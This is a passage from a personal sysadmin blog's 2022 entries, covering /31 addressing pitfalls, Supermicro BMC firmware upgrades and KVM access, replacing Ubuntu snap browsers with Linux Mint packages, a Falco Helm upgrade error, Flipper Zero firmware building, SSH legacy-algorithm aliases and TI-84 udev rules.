Notes to self (wjd.nu)

Notes to self, 2022

Year: 2025 |2024 |2023 |2022 |2021 |2020 |2019 |2018 |2017 |2016 |2015 |2014 |2013 |2012 |2011 |2010 |2009 |2008 |2007 |2006 |index

2022-10-19 - avoiding 255 / 31-bit prefixes

At OSSO, we've been using a spine-leaf architecture in the datacenter, using BGP and Layer 3 to the host. This means that we can have any IP address of ours just pop up anywhere in our network, simply by adding a prefix on a leaf switch. We sacrifice half of our IP space for this. But we gain simplicity by avoiding all Layer 2 tricks.

TL;DR: Avoid IP addresses ending in .255 for endpoints.

31-bit prefixes on Point-to-Point Links

Do we want IP 1.2.3.5 to show up somewhere? We'll just enable the 1.2.3.4/31 prefix on the relevant port on leafX. BGP handles that both IPs are now reachable on the leaf switch and 1.2.3.5 can be reached at the selected switch port.

This makes deploying and moving services a breeze. And we don't have to deal with Layer 2 hacks. But as you can see, we have to sacrifice one IP (the switch end) per prefix.

Normally, networks have to contain a network address (x.x.x.0 for a class C network) and a broadcast address (x.x.x.255). Thus, the smallest network would be 2 bits: e.g. 1.2.3.0/30:

IP	what
1.2.3.0	network address
1.2.3.1	usable IP
1.2.3.2	usable IP
1.2.3.3	broadcast address

The network address is obsolete and never used. And the broadcast address equates to “the other host”, so it is not needed for networks with only two parties. Therefore RFC 3021 specifies that for such small networks, we only need two addresses: a /31.

Wasting 75% of our address space would've been awful, but wasting 50% is a good trade-off for what we're winning.

The problem with Windows

Microsoft unfortunately did not read RFC 3021, so for those hosts we're stuck wasting two additional IP addresses. I've seen reports that one could use a /32 on the Windows side, and it will effectively work as if it was a /31, but this has not been verified by us.

The problem with some routers

Recently we ran into an issue where someone could connect to a service from work, but not from home. Investigation revealed that the problem arose because the endpoint was on an IP address that ends in .255.

Following the setup above, we can hand out all 128 prefixes from 1.2.3.0/31 up to 1.2.3.254/31. By convention we assigned the even IP — here 1.2.3.254 — to the switch: this meant that the endpoint/service got address 1.2.3.255.

This had been running fine for years, until now.

The user with issues was using the KPN network (86.90.0.0/16), with an Experia box V8 (Arcadyan, Astoria Networks VGV7519), S/N A30401xxxx, MAC 84:9C:A6:xx:xx:xx. Apparently that device treats addresses that end in .255 specially, and drops packets headed in that direction.

We tested this with two different public IP addresses that ended in .255. Neither IP would receive UDP or ICMP from this NAT-router. Traffic to neighbouring IPs had no issues. Maybe this is some overeager Smurf Attack protection?

(Here's a note to KPN: please fix your firmware!)

Avoid using 255 for endpoints

Moral of the story: we'll keep the convention of assigning the uneven address to the endpoint, except for the .255 address, which we'll assign to the switch instead. This should avoid problems with crappy routers in the future. We know the real network hardware beyond that will cope.

2022-09-09 - supermicro / x9drw / quest for kvm

I'm connected to an “ancient” Supermicro machine — according to today's standards — that saw the light somewhere around 2013. I'm looking for a way to access the KVM module (Keyboard, Video, Mouse) so I can update it safely. You know, to be able to fix boot issues if they arise. Unfortunately, the firmware is rather old and I cannot get the iKVM application to run, like I'm used to.

Using ipmikvm

Normally, for these Supermicro servers, I use the ipmikvm wrapper. It's a script that (a) logs into the web interface, (b) downloads launch.jnlp, (c) parses it and fetches the prerequisite jar files and lastly (d) fires up Java to start the iKVM application.

You type this:

$ ipmikvm -u $USER -p $PASS $IP

The script then fires up the appropriate Java application for that particular host, generally a particular generation of the iKVM application that comes with the firmware.

For this oldie from 2013 however, that did not work:

The web interface is different, and ipmikvm cannot find launch.jnlp;
downloading launch.jnlp manually is troublesome, because the web server writes invalid Content-Length headers;
running the provided JViewer did not appear to work: the user interface started, but showed “0 fps” in the title bar and no video was shown.

We can go into the browser network inspector and use Copy as cURL to download the launch properties file:

curl -vv 'http://IP/Java/jviewer.jnlp?EXTRNIP=IP&JNLPSTR=JViewer' \
  -H $'Cookie: test=1; ...' \
  -H 'Referer: http://IP/page/jviewer_launch.html?JNLPSTR=JViewer&JNLPNAME=/Java/jviewer.jnlp' \
  --compressed \
  --insecure \
  >launch.jnlp

...

< HTTP/1.0 200 OK
< Server: GoAhead-Webs
< Expires: 0
< Content-length: 4134
< Content-type: application/x-java-jnlp-file
< Set-Cookie: test=1;path=/
< 
{ [1216 bytes data]
* transfer closed with 1070 bytes remaining to read
* Closing connection 0
curl: (18) transfer closed with 1070 bytes remaining to read

A valid launch.jnlp XML file of 3065 bytes is fetched, even though the server promised me 4134 bytes. An annoying bug, because newer browsers will refuse to store this file.

Does it run?

Yes! But only after fixing ipmikvm so it also downloads and unzips Linux_x86_64.jar for old JViewer:

$ ipmikvm ./launch.jnlp 
...
+ exec java -Djava.library.path=/home/walter/.local/lib/ipmikvm/JViewer/release \
  -cp /home/walter/.local/lib/ipmikvm/JViewer/release/JViewer.jar \
  com.ami.kvm.jviewer.JViewer -apptype JViewer -hostname IP \
  -kvmtoken gWQwGxvrstzd -kvmsecure 0 -kvmport 7578 -vmsecure 0 \
  -cdstate 1 -fdstate 1 -hdstate 1 -cdport 5120 -fdport 5122 \
  -hdport 5123 -cdnum 1 -fdnum 1 -hdnum 1 -userpriv 255 -lang EN \
  -webcookie 76741dOicDdU4NSgnzyIIVTv

Access to libjava*.so was a needed for the application to work properly.

Upgrading firmware to SMM_X9_2_35

Before I found and fixed the ipmikvm problem, I tried to tackle this by upgrading the firmware. That seemed like the best way forward but boy, was I wrong.

To find the right firmware, one needs to know the board version:

# journalctl -b0 -ocat --grep DMI:
DMI: Supermicro X9DRW/X9DRW, BIOS 3.0a 08/08/2013

# ipmitool mc info
Device ID                 : 32
Device Revision           : 1
Firmware Revision         : 2.19
IPMI Version              : 2.0
Manufacturer ID           : 10876
Manufacturer Name         : Supermicro
Product ID                : 43707 (0xaabb)
Product Name              : Unknown (0xAABB)
Device Available          : yes
Provides Device SDRs      : no

(There is also dmidecode, but it tells us nothing more than we already know.)

So, it's a Supermicro X9DRW with BMC Firmware version 2.19 installed. Unfortunately, finding and installing appropriate firmware is easier said than done.

WARNING/CAVEATS: Before you go any further: if you're doing this on a remote machine, make sure you have /dev/ipmi0 access to it, so you can reconfigure the LAN address and/or authentication after resetting/flashing the firmware.

On the web interface of this BMC, there was an BMC Firmware Update button, but nowhere to upload any firmware. Pressing the update button made it go into “update mode” but that did nothing more than stall the BMC for at least 15 minutes.

Attempts to access the web interface during that time, showed:

Access Error: Target device firmware is
being upgraded and not currently available.
Please try again after update completes.

Card in flash mode !

Luckily, it snapped out of that after a while (15 minutes?). Another thing to keep in mind: every time the BMC does a cold reset, it takes about 85 seconds for it to come back.

We needed something better...

After several attempts with firmwares from Drunkencat Supermicro BIOS, I did get it to install version 2.35, like this:

$ unzip ../SMM_X9_2_35.zip

$ unzip RLinFlsh2.9.zip

$ cd Linux_x86_64/

$ LD_LIBRARY_PATH=. ./RLin64Flsh -nw -ip $IP -u $USER -p $PASS -i ../SMM_X9_2_35.ima 
./RLin64Flsh: error while loading shared libraries: libipmi.so.1: cannot open shared object file: No such file or directory

(I should write something about using confinement (firejail, docker, apparmor) when running untrusted binaries here. But that is for another day.)

$ ln -s libipmi.so.1.0 libipmi.so.1

$ LD_LIBRARY_PATH=. ./RLin64Flsh -nw -ip $IP -u $USER -p $PASS -i ../SMM_X9_2_35.ima 
-------------------------------------------------
YAFUFlash - Firmware Upgrade Utility (Version 2.9)
-------------------------------------------------
(C)Copyright 2008, American Megatrends Inc.

Creating IPMI session via network with address IP...Done
===============================================================================
                             Firmware Details 
===============================================================================
    RomImage                   ExistingImage from Flash 

    ModuleName   Description   Version     ModuleName   Description   Version
1.  boot         BootLoader    0.2         boot          BootLoader    0.1 
2.  pcie                       0.1         pcie                        0.1 
3.  conf         ConfigParams  0.1         conf          ConfigParams  0.1 
4.  bkupconf                   1.2         bkupconf                    1.2 
5.  root         Root          0.1         root          Root          0.1 
6.  osimage      Linux OS      0.6         osimage       Linux OS      0.6 
7.  www          Web Pages     0.6         www           Web Pages     0.6 
8.  rainier                    2.35         rainier                     2.19 

For Full Firmware upgrade,Please  type (0)  alone
For Module Upgrade enter the total no. of Modules to Upgrade 
Enter your choice : 1
Enter the Module Name to Update : rainier

****************************************************************************
 WARNING!
        FIRMWARE UPGRADE MUST NOT BE INTERRUPTED ONCE IT IS STARTED.
        PLEASE DO NOT USE THIS FLASH TOOL FROM THE REDIRECTION CONSOLE.
****************************************************************************
Updating the module rainier ..... Done
Resetting the firmware..........

The above output was from one of the lucky tries. During other attempts I got Error in activate flash mode or some other error. It appeared that updating firmware using RLin64Flsh was not very deterministic with seemingly random failures.

Failing upgrades to SMT_X9_315

Trying to update to 3.15 or 3.53 did not pan out well either. The zip files contain an lUpdate tool that did not work remotely (-i lan). It did operate on /dev/ipmi0, albeit very slowly.

Using the local lUpdate started promising, with three upload phases. However, all attempts with ended in:

Please wait....If the FW update fails. PLEASE WAIT 5 MINS AND REMOVE THE AC...


Update progress:193 %

193%!? Hopeless...

Other attempts

I also tried the fwum option in ipmitool:

# ipmitool fwum info
FWUM extension Version 1.3

IPMC Info
=========
Manufacturer Id           : 10876
Board Id                  : 43707
Firmware Revision         : 2.35
FWUM Firmware Get Info returned c1

But "downloading" firmware onto the BMC only got me segmentation faults, i.e. bugs in ipmitool itself.

I've come to believe that not being able to upgrade to 3.x is probably a Renesas (X9, *.ima) versus Harmon (X9, *.bin) thing. Likely this machine has Renesas BMC hardware and will not update to any newer firmware.

After some more failed attempts at upgrading to firmware versions in the 3.x range, I did manage to update it to 2.60 through sheer luck. In the mean time, I also tried a factory reset. For that it is important that you have /dev/ipmi0 access, so you can fix (static) IPs:

ipmitool lan set 1 ipsrc static
ipmitool lan set 1 ipaddr 1.2.3.4
ipmitool lan set 1 netmask 255.255.255.0
ipmitool lan set 1 defgw ipaddr 1.2.3.1   
ipmitool lan set 1 ipsrc static

If you forget to set it to static first, you get the following error, along with a timeout:

# ipmitool lan set 1 defgw ipaddr 1.2.3.1
Setting LAN Default Gateway IP to 1.2.3.1
LAN Parameter Data does not match!  Write may have failed.

But alas, no working JViewer after the factory reset either.

Upgrading firmware to SMM_X9_2_77

I managed upgrading to 2.77 — the latest 2.x I could find — using SMCIPMITool, which you can fetch from the Supermicro downloads if you agree to Supermicro's terms.

File Name:SMM_X9_2_77.zip
Revision:2.77
Size(KB):20,461
This zip file contains BIOS ROM, Flash utility, and Readme
instructions. You may download the free WINZIP utility to
extract the ontents of this file.
MD5:dd3c8aee63b60f3fc2485caed05f669a
SHA1:3906d2367ca22bdb54d69e8723bad34f0cd032e1
SHA256:eba03b51c5e8ebc561481cd136c305ef9495ff197b3ec56817dc3646190aef97

$ md5sum ../SMCIPMITool_2.26.0_build.220209_bundleJRE_Linux_x64.tar.gz 
6a50f5246e0e472d1c80bd1fb6378bba  SMCIPMITool_2.26.0_build.220209_bundleJRE_Linux_x64.tar.gz

$ ./SMCIPMITool $IP $USER $PASS ipmi flashr ../../2.77/SMM_X9_2_77.ima 
**************************************************************
WARNING!
Firmware upgrade must not be interrupted once it is started.
Once you get error after Upgrading, please use local KCS tool
for recovery.(DOS:RKCSFlsh.exe, Linux:RLin32Flsh or 
Windows:RWin32Flsh.exe ) 
**************************************************************
Check firmware file... Done (ver:2.77.0)
Check BMC status... Done (ver:2.60.0)
Enter to Flash Mode

Uploading >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>100% 
Upgrading >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>100% 
Verifying >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>100% 
Resetting BMC
Success
Total Elapse Time: 20 min 26 sec(s)

This felt a lot less flaky. Finally a tool that is less vague about what it's doing and whether it's doing anything at all.

Using SMCIPMITool

The mentioned SMCIPMITool appears to be better than many of the other tools out there.

$ ./SMCIPMITool $IP $USER $PASS ipmi ver
Firmware Revision  = 02.77.00
IPMI Version       = 2.0
Manufacturer ID    = 7C 2A 00 
product ID         = BB AA 00

$ ./SMCIPMITool $IP $USER $PASS nm ver
Node Manager Version = 2.0
Firmware Version     = 2.17

$ ./SMCIPMITool $IP $USER $PASS nm20 summary
...
             Power Usage              
+------------------------------------+
|Domain                  |  Usage (W)|
+====================================+
|Entire platform         |        153|
+------------------------------------+
|CPU subsystem           |         38|
+------------------------------------+
|Memory subsystem        |          6|
+------------------------------------+

Using SMCIPMITool for KVM

In fact, you can also use SMCIPMITool for KVM purposes:

$ ./SMCIPMITool $IP $USER $PASS ukvm
Starting JViewer (X9) Process...Done
Please wait for JViewer (X9) window

This opened the JViewer application. And this was the first time I got video instead of the dreaded “0 fps”.

Under the hood, SMCIPMITool looks up which firmware it speaks to, and then invokes a bundled JViewer.jar, like this:

$ java -jar JViewerX9.jar $IP $USER $PASS

(For newer firmwares it will invoke the bundled iKVM application instead.)

So, it might be a good idea to get that SMCIPMITool_2.26.0_build.220209_bundleJRE_Linux_x64.tar.gz and its contained JViewerX9.jar today and store it somewhere safe.

2022-08-31 - chromium browser / without ubuntu snap / linux mint

In 2019, Clement "Clem" Lefebvre of Linux Mint, wrote these profetic words: “As long as snap is a solution to a problem, it’s great. Just like Flatpak, it can solve some of the real issues we have with frozen package bases. It can provide us with software we couldn’t otherwise run as packages. When it starts replacing packages for no good reason though, when it starts harming our interaction with upstream projects and software vendors and reducing our choice, it becomes a threat.”

For me, this point appears to have arrived on Ubuntu. The chromium-browser has been moved to a snap package in Ubuntu 20.04. Firefox also moved to snap in Ubuntu 22.04. Is this a problem?

Yes! It is.

Since the (silent) replacement of these packages to snap packages, I've ran into:

Font issues that are caused by the snap confinement, but are not common enough to get properly fixed.
A grave bug with drag and drop, that was broken in all available snaps: I had to export a snap from another machine that still had a non-broken chromium-browser. Getting an older (working) version from the snapcraft store was not supported. Instead I was told I should've made backups... of an application. (Exploding head emoji here.)
Forced automatic updates (with a couple of issues), that force me to restart my browser.
There are minor annoyances, like extra memory/disk usage, extra items in df and mount listings.
Failed file uploads for no good reason (non-$USER-owned files in my homedir are blacklisted) and with no visible cause. The snapcraft developers consider such use "exotic". I mean, who in their right mind has tcpdump-owned files in their homedir? /s

I think that last one, and especially the mindset of the developers — “we force people to adapt to far worse workarounds than running chown on files for much more common usecases” — is the straw that broke the camel's back.

Moving to Mint Packages

Ubuntu has served me great both as desktop and server system well over twelve years. Canonical did not always get everything right in the first try (upstart anyone?), but generally stuff has worked remarkably well. For that I am grateful.

So, instead of flat out ditching Ubuntu, I shall first try if we can just borrow packages from Linux Mint. I'm running Ubuntu/Jammy 22.04 off of which Linux Mint Vanessa 21 is based. (For Focal 20.04, there is Mint 20.3 Una.)

Setting it up (as root):

echo "deb [signed-by=/etc/apt/keyrings/linuxmint.com.gpg]\
 http://packages.linuxmint.com vanessa upstream" \
  >/etc/apt/sources.list.d/linuxmint.list

mkdir -p /etc/apt/keyrings

tmp=$(mktemp -d) &&
  GNUPGHOME=$tmp gpg --keyserver keyserver.ubuntu.com \
    --recv-keys 0xA6616109451BBBF2 &&
  GNUPGHOME=$tmp gpg --export A6616109451BBBF2 \
    >/etc/apt/keyrings/linuxmint.com.gpg &&
  rm -rf $tmp

cat >/etc/apt/preferences.d/linuxmint-against-snapcraft.pref <<EOF
Package: *
Pin: origin packages.linuxmint.com
Pin-Priority: -1

# Pinning does not need to go above 1000 because we do not need to
# downgrade. Ubuntu does not ship with a chromium package.
Package: chromium
Pin: origin packages.linuxmint.com
Pin-Priority: 600

# Firefox depends on ubuntu-system-adjustments, but you can install
# https://github.com/wdoekes/nosnap-deb/releases/download/v0.1/nosnap_0.1_all.deb
# as replacement.
Package: firefox
Pin: origin packages.linuxmint.com
Pin-Priority: 1000

# Thunderbird is still shipped as a real OS-component, so this is not needed yet.
#Package: thunderbird
EOF

apt-get update && apt-get install chromium

We'll see how this pans out and if we can purge snapd with fire.

$ snap list chromium
Name      Version        Rev
chromium  104.0.5112.79  2051

$ dpkg -l | grep chromium
ii  chromium  104.0.5112.101~linuxmint1+vanessa

So far, so good...

Using packages from other Distros?

Is it a good idea to use a package from Linux Mint?

If you're aware of the pitfalls, and its dependencies don't diverge from what you already have (Mint is based on Ubuntu), you should be fine.

Additionally, I can recommend apt-find-foreign, a tool that lists the origin of packages on your Debian derivative system. A run might look like this:

$ apt-find-foreign 
Lists with corresponding package counts:
  3224  http://archive.ubuntu.com/ubuntu
  4     http://ddebs.ubuntu.com
  1     http://packages.linuxmint.com

Lists with very few packages (or with remarks):
  http://ddebs.ubuntu.com
    - libmount1-dbgsym
    - mount-dbgsym
    - openssh-client-dbgsym
    - util-linux-dbgsym
  http://packages.linuxmint.com
    - chromium

It's good practice to run this after doing package upgrades to confirm that you don't have unexpected foreign (or old) packages on your system.

Profile gone?

Yes. The new Mint Chromium does not read the profile of your Snap Chromium. If you want to keep bookmarks, current sessions, etc., you'll need to do some migrating.

This should be sufficient before your first run:

rm -rf ~/.config/chromium

cp -a ~/snap/chromium/common/chromium ~/.config/chromium

Once you're happy, you can remove the ~/snap/ stuff.

Also on Focal?

For Ubuntu/Focal you need to use una instead of vanessa in the /etc/apt/sources.list.d/linuxmint.list file.

As of this writing, there is a font/color issue with background tab text: inactive tabs have an icon but no label text. This can be fixed by going into Settings, Appearance and selecting the Classic theme, instead of GTK+.

Google as search engine?

Go to Chromium settings, Search engine, Manage, Add a new “site search”:

Search engine: Google
Shortcut:      g
URLs:          https://www.google.com/search?q=%s
(or)
URLs:          {google:baseURL}search?q=%s&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchboxStats}{google:searchFieldtrialParameter}{google:iOSSearchLanguage}{google:prefetchSource}{google:searchClient}{google:sourceId}{google:contextualSearchVersion}ie={inputEncoding}

And then click Make default from its hamburger menu.

Firefox?

The same steps as above apply. But you'll need a ubuntu-system-adjustments >= 2021.12.16 package to satisfy the dependencies of the Firefox package. You can download and install nosnap_0.1_all.deb that provides such a dependency:

wget https://github.com/wdoekes/nosnap-deb/releases/download/v0.1/nosnap_0.1_all.deb

(sha256sum 1b634ca7 a66814a0 40907c6b a726fd5a a63e1687 5a24a8ce 6b7b28d8 0d0e1e5a nosnap_0.1_all.deb)

dpkg -i nosnap_0.1_all.deb

apt-get install firefox

rm -rf ~/.mozilla

cp -a ~/snap/firefox/common/.mozilla ~/.mozilla

At this point, you may need to do some magic, because over here, I had to fiddle with profiles.ini like this:

--- .mozilla/firefox/installs.ini
+++ .mozilla/firefox/installs.ini
@@ -1,3 +1,4 @@
 [4C36D121DA48BA8E]
 Default=fvorzk4r.default-1644166646276
+Locked=1
 
--- .mozilla/firefox/profiles.ini
+++ .mozilla/firefox/profiles.ini
@@ -1,3 +1,7 @@
+[Install4C36D121DA48BA8E]
+Default=fvorzk4r.default-1644166646276
+Locked=1
+
 [Profile0]
 Name=default
 IsRelative=1

Doing the above changes fixed so the right profile was loaded when starting Firefox.

Purging snapd?

I'll leave the purging — or at least the disabling from auto-starting while you're not using it — of snapd to another post.

Final words

I am not against Snap (or AppImage or Flatpak). They have their uses for applications that not everyone uses all the time. I've certainly used it for the Arduino IDE — until the strict confinement disallowed me from setting up the Micro:bit environment — or the Drawio app — until I ran into a version that crashed when trying to save, because of bad library dependencies inside the snap. But for standard packages that can be considered part of the OS — I'm talking about web browsers — using snap is a bridge too far. Especially if it secretly introduces confinement that you are not made aware of.

2022-08-30 - falco helm upgrade / labelselector field immutable

Today I got this unusual error when upgrading the Falco helm chart from 1.19.4 to 2.0+.

Error: UPGRADE FAILED: cannot patch "falco" with kind DaemonSet:
 DaemonSet.apps "falco" is invalid:
 spec.selector: Invalid value: v1.LabelSelector{
  MatchLabels:map[string]string{"app.kubernetes.io/instance":"falco", "app.kubernetes.io/name":"falco"},
  MatchExpressions:[]v1.LabelSelectorRequirement(nil)
 }: field is immutable

The explanation is here as given by Stackoverflow user misha2048:

You cannot update selectors for [...] ReplicasSets, Deployments, DaemonSets [...] from my-app: ABC to my-app: XYZ and then simply [apply the changes].

Instead, you should kubectl delete ds falco first. In this case, because the labels changed from:

labels:
  app: falco
  app.kubernetes.io/managed-by: Helm
  chart: falco-1.19.4
  heritage: Helm
  release: falco

to:

labels:
  app.kubernetes.io/instance: falco
  app.kubernetes.io/managed-by: Helm
  app.kubernetes.io/name: falco
  app.kubernetes.io/version: 0.32.2
  helm.sh/chart: falco-2.0.16

Maybe it would've been nice if this was mentioned in the not so verbose Falco Helm changelog. Are there upgrade docs anywhere?

2022-08-11 - flipper zero multi-tool / developing

Here are some pointers on how to get started editing/developing plugins for the Flipper Zero multi-tool.

(When writing this, the stable version was at 0.63.3. Things are moving fast, so some of the next bits may be outdated when you read them.)

Starting

Starting the Flipper Zero and adding an SD-card is documented in Flipper Zero first-start.

Now you can use all the nice pentest features already included. The SD-card is necessary to unlock some features.

When you first get your hands on your Flipper, you'll likely want to play around a bit now, scanning your NFC tags and radio controls.

Firmware

To update the firmware, you'll need to download qFlipper, attach the Flipper Zero to your USB port and click the INSTALL button, as documented in Flipper Zero firmware-update. On Linux you may need to add the following to /etc/udev/rules.d/42-flipperzero.rules first (and then run udevadm control --reload-rules and udevadm trigger as root):

#Flipper Zero serial port
SUBSYSTEMS=="usb", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5740", ATTRS{manufacturer}=="Flipper Devices Inc.", TAG+="uaccess"
#Flipper Zero DFU
SUBSYSTEMS=="usb", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="df11", ATTRS{manufacturer}=="STMicroelectronics", TAG+="uaccess"
#Flipper ESP32s2 BlackMagic
SUBSYSTEMS=="usb", ATTRS{idVendor}=="303a", ATTRS{idProduct}=="40??", ATTRS{manufacturer}=="Flipper Devices Inc.", TAG+="uaccess"

The usage of qFlipper should be self-explanatory.

Plugins

At this point — while writing, we're on firmware 0.63.3 — adding plugins is not trivial yet. The Flipper Zero development page is empty.

No, this page did not help me ;-)

Some tutorials/examples exist elsewhere, like mfulz/Flipper-Plugin-Tutorial. A good alternative is to take the existing Snake game and remove all the code until you're left with something that does little more than print Hello World.

Building

Building a plugin means building the entire firmware. The steps involved are:

git clone https://github.com/flipperdevices/flipperzero-firmware
cd flipperzero-firmware/
git submodule init
git submodule update
sudo apt-get install scons openocd clang-format-13 dfu-util protobuf-compiler  # see ReadMe.md

Check out an appropriate version:

$ git tag -l | sort -V | tail -n3
0.63.2-rc
0.63.3
0.63.3-rc

$ git checkout -b branch-0.63.3 0.63.3

$ ./fbt

This yields a nice ./build/latest/firmware.dfu which can be uploaded using qFlipper.

If you want your (modified) version recorded in the About screen, you'll need to tag it. If git describe --exact-match returns no match, then the version shown will be "unknown". The git commit id is always shown regardless.

I'll plan on following up on this post with some documentation on using the GPIO-ports and connecting a temperature sensor. To be continued...

P.S. If you've managed to freeze your Flipper, have no fear. The LEFT+BACK button combination makes it reset. Or, alternately, holding BACK for 30+ seconds.

Update 2022-09-02

In the mean time, I did get some fixes in:

Changes so I can attach a temperature sensor and read it, are still pending:

Alter onewire API to allow GPIO pins too

Flipper Zero with DS18B20 sensor attached to GPIO pin C0, reading 23.3 degress Celcius

In the mean time, you can look at these repositories for more inspiration:

A collection of Awesome resources (djsime1/awesome-flipperzero)
Tetris (on evilaliv3/flipperzero-sequencerz-app)
Older Flipper development documentation (by Aiden Manos)

Getting U2F to work on Ubuntu with snap

If you're using Chromium or Firefox in snap, you may need some extra udev rules too:

--- 70-snap.chromium.rules  2022-08-12 18:07:02.865910207 +0200
+++ 70-snap.chromium.rules  2022-08-12 18:07:43.297930862 +0200
@@ -107,6 +107,8 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_chromium_chromedriver"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_chromium_chromedriver"
 TAG=="snap_chromium_chromedriver", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_chromium_chromedriver $devpath $major:$minor"
 # bluez
 KERNEL=="rfkill", TAG+="snap_chromium_chromium"
@@ -216,4 +218,6 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_chromium_chromium"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_chromium_chromium"
 TAG=="snap_chromium_chromium", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_chromium_chromium $devpath $major:$minor"

--- 70-snap.firefox.rules  2022-08-12 18:06:09.309883567 +0200
+++ 70-snap.firefox.rules  2022-08-12 18:06:33.853895670 +0200
@@ -105,6 +105,8 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_firefox_firefox"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_firefox_firefox"
 TAG=="snap_firefox_firefox", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_firefox_firefox $devpath $major:$minor"
 # camera
 KERNEL=="vchiq", TAG+="snap_firefox_geckodriver"
@@ -212,4 +214,6 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_firefox_geckodriver"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_firefox_geckodriver"
 TAG=="snap_firefox_geckodriver", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_firefox_geckodriver $devpath $major:$minor"

Reloading udev: udevadm control --reload-rules && udevadm trigger

2022-07-12 - ubuntu jammy / ssh / rsa keys

With the new Ubuntu/Jammy we also get tighter security settings. Here are some aliases that will let you connect to older ssh servers.

For access to old Cisco routers, we already had the first two options in this alias; we now add two more:

# Alias on Ubuntu/Jammy with ssh 8.9p1-3+ to access old routers/switches:
alias ssholdhw="ssh \
    -oKexAlgorithms=+diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 \
    -oCiphers=+aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc \
    -oHostkeyAlgorithms=+ssh-rsa \
    -oPubkeyAcceptedKeyTypes=+ssh-rsa"

That fixes so we can connect to old Cisco and old HP equipment.

When connecting to slightly less old hardware — Cumulus Linux 3.7 — we notice we'll also need some tweaks:

$ ssh 10.1.2.3
walter@10.1.2.3: Permission denied (publickey).

What? Is my RSA key revoked?

$ ssh 10.1.2.3 -v
...
debug1: Offering public key: /home/walter/.ssh/id_ed25519 ED25519 SHA256:3A..
debug1: Authentications that can continue: publickey
debug1: Offering public key: cardno:00xx RSA SHA256:xC..
debug1: send_pubkey_test: no mutual signature algorithm
debug1: Offering public key: /home/walter/.ssh/id_rsa RSA SHA256:ph..
debug1: send_pubkey_test: no mutual signature algorithm
...
walter@10.1.2.3: Permission denied (publickey).

Okay, not revoked, but no mutual signature algorithm. That is fixable:

# Alias on Ubuntu/Jammy with ssh 8.9p1-3+ to access OpenSSH 6.7:
alias sshold="ssh -oPubkeyAcceptedKeyTypes=+ssh-rsa"

$ sshold 10.1.2.3
Welcome to Cumulus (R) Linux (R)

Better.

Update 2023-03-29

Added diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 to ssholdhw which was needed for some machines.

2022-07-10 - ti-84 ce-t / asm / ubuntu / doom

Prerequisites for loading games and other binaries in the Texas Instruments TI-84 CE-T Python Edition using Ubuntu/Jammy.

Apparently Texas Instruments has decided that we're not allowed to run binaries on the Graphing Calculator anymore. I remember that we used to be able to run a Mario game clone on the TI-83 back in the nineties. This feature has now been locked down, removing the Asm() call from the function catalog.

Naturally we had to have a — really limited PoC — DOOM on the calculator anyway, so some steps had to be performed:

charge up the TI-84 with the provided mini-USB cable;
install tilp2 — straight from the jammy/universe;

add udev rules at /etc/udev/rules.d/69-libticables.rules:

ACTION!="add", GOTO="libticables_end"

# serial device (assume TI calculator)
KERNEL=="ttyS[0-3]", ENV{ID_PDA}="1"
# parallel device (assume TI calculator)
SUBSYSTEM=="ppdev", ENV{ID_PDA}="1"
# SilverLink
SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e001", ENV{ID_PDA}="1"
# TI-84+ DirectLink
SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e003", ENV{ID_PDA}="1"
# TI-89 Titanium DirectLink
SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e004", ENV{ID_PDA}="1"
# TI-84+ SE DirectLink
SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e008", ENV{ID_PDA}="1"
# TI-Nspire DirectLink
SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e012", ENV{ID_PDA}="1"
# Lab Cradle / Datatracker Cradle
